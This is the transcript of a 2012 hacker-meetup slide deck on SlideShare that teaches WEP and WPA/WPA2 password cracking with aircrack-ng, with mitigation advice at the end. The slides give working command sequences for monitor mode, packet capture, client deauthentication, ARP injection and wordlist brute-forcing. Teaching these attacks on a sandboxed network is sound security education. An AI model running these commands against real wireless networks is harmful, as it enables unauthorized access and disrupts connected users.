Your SlideShare is downloading. ×
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-Security
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Feb-8-2012-Breaking-Wireless-Security

2,092

Published on

Presentation I gave at DC207's regular meeting hosted at BlueTarp Financial (https://www.bluetarp.com). …

Presentation I gave at DC207's regular meeting hosted at BlueTarp Financial (https://www.bluetarp.com).

The presentation is a quick overview to a group of industry professionals and university students (many of who have never done anything like this) of using the aircrack-ng suite of tools to crack WEP and WPA passwords. A sandboxed wireless network was setup and live demonstrations were done.

Published in: Technology
1 Comment
0 Likes
Statistics
Notes
  • very strong password breaker
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Be the first to like this

No Downloads
Views
Total Views
2,092
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
71
Comments
1
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Breaking Wireless Security cracking WEP & WPA presented by Casey DC207
  • 2. what we're covering
    • Using aircrack-ng suite to
      • capture wireless traffic
      • 3. retrieve WEP password
      • 4. retrieve WPA/WPA2 passwords
  • 5. what we're not covering
    • cryptographic specifics
    • 6. in depth packet analysis
    • 7. brute forcing WPS (Wi-Fi Protected Setup)
      • time
  • 8. t00ls
    • BackTrack Linux
    • 9. Aircrack-ng
    • 10. ALFA Wireless USB Adapter
      • (Model AWUS036H)
  • 11. Yay! BlueTarp!
  • 12. WEP
    • Wired Equivalent Privacy (WEP)
    • 13. Sept. 1999 in original 802.11 standard
    • 14. uses an RC4 Stream Cipher
    • 15. crypto is inherently flawed
    • 16. deprecated in 2004 in favor of WPA2
    • 17. still available on routers today
  • 18. WEP encryption
    • RC4 cipher uses Key + IV (Initial Values)
    • 19. august 2001, Scott Fluhrer, Itsik Mantin, and Adi Shamir
    • 20. passive attack to recover Key
    • 21. need a busy network or a way to produce enough traffic
    • 22. with enough IVs can calculate the Key
  • 23. cracking WEP
    • place card in monitor mode
      • # airmon-ng start wlan0
    • capture packets to the desired AP
      • # airodump-ng mon0 –bssid bssid –channel c –write crackme
    • wait for an authorized client to connect
      • can also deauthorize clients
        • # aireplay-ng -0 5 -a bssid mon0
    • spoof ARP responses to generate more traffic
      • # aireplay-ng -3 -b bssid -h client_mac mon0
    • use aircrack-ng to crack the key
      • # aircrack-ng crackme.cap
  • 24. DEMO
  • 25. WEP cracking mitigation
    • none.
    • 26. don't use.
    • 27. password complexity DOES NOT MATTER
  • 28. WPA
    • Wi-Fi Protected Access
    • 29. WPA became available in 1999
    • 30. uses TKIP encryption algorithm
    • 31. intermediate step until WPA2
  • 32. WPA2
    • WPA2 available in 2004
    • 33. uses CCMP-AES encryption
    • 34. WPA-Personal PSK (Pre-Shared Key)
      • home/small office use
    • WPA-Enterprise
      • Requires a RADIUS server for authentication
  • 35. WPA encryption
    • encryption based on AES
    • 36. no known public exploits that attacks the crypto
    • 37. brute force attack
    • 38. uses SSID of network as part of encryption
    • 39. precomputation is much harder
  • 40. Yay! BlueTarp!
  • 41. cracking WPA / WPA2
    • place card in monitor mode
      • # airmon-ng start wlan0
    • capture packets to the desired AP
      • # airodump-ng mon0 –bssid bssid –channel c –write crackme
    • capture handshake from connecting client
      • can force clients to deauth to capture it
        • # aireplay-ng -0 5 -a bssid mon0
    • use aircrack-ng to try and brute force key
      • requires a good wordlist
        • # aircrack-ng crackeme.cap -w wordlist
  • 42. DEMO
  • 43. WPA cracking mitigation
    • use a password >= 15 characters
    • 44. don't use a name in the top 1000 SSID list
    • 45. disable WPS!
  • 46. WPS
    • Wi-Fi Protected Setup
    • 47. attempt at easy secure access
    • 48. wanted to make it easy to add new devices
    • 49. almost universally enabled on new routers
    • 50. completely fails to brute force attack
      • revealed in December 2011
      • 51. get the WPS pin, use it to retrieve the PSK
    • when enabled renders WPA/WPA2 useless
    • 52. linksys routers still vulnerable with WPS disabled
  • 53. Thanks for coming! Thank you Jon and BlueTarp for hosting and food! Questions? Help? [email_address] @CaseyDunham dc207.org @DCG207
  • 54. resources
    • BackTrack Linux backtrack-linux.org
    • 55. Aircrack-ng aircrack-ng.org
    • 56. ALFA Networks alfa.com.tw
    • 57. DC207 dc207.org
    • 58. BlueTarp bluetarp.com

×